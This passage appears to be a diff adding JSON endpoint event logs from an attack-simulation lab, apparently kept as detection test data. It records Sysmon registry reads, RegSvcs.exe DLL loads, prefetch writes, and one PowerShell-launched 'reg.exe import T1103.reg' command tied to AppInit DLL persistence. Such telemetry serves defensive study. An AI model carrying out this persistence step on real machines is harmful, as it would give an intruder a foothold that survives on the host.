"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.Wrapper.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.Wrapper.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.Wrapper.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "subtype": "terminate", + "timestamp": 131883570871990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "file", + "file_name": "REGASM.EXE-8A092F8F.pf", + "file_path": "C:\\Windows\\Prefetch\\REGASM.EXE-8A092F8F.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": 
"c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570872770000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "CSC.EXE-F7BE4369.pf", + "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570872770000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "REGSVCS.EXE-ED64D53D.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVCS.EXE-ED64D53D.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570872770000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg.exe import T1103.reg\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6964, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570874900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, 
+ "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "command_line": "reg.exe import T1103.reg", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1784, + "ppid": 6964, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570874990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}", + "unique_ppid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + 
"pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 
131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "process", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "process", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8152, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570875160000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + 